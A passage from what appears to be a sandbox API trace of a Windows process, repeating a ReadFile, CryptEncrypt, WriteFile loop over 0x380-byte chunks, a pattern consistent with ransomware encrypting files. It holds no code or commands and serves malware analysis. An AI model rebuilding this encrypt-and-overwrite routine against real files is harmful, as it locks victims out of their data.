pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.350] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.350] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.350] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.350] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.350] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.350] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.350] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.350] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.350] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.350] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.350] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.350] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.351] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.351] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.351] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.351] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.351] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.351] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.351] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.351] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.351] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.351] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.351] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.352] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.352] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.352] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.352] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.352] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.353] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.353] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.353] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.353] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.353] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.353] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.353] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.353] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.353] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.353] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.353] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.353] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.354] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.354] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.355] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.355] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.355] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.355] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.355] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.355] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.355] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.355] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.355] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.355] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.355] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.355] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.355] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.356] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.356] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.356] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.356] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.356] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.357] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.357] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.357] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.357] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.357] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.357] WriteFile (in: hFile=0x5d48, 